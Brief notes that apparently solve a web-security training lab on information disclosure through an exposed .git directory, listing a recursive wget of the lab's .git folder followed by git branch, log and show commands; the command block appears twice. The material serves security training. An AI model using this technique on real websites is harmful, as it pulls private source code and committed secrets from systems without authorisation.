5 - Information disclosure in version control history
wget -r https://YOUR-LAB-ID.web-security-academy.net/.git/
git branch
git log
git show <hash commit>
wget -r https://YOUR-LAB-ID.web-security-academy.net/.git/
git branch
git log
git show <hash commit>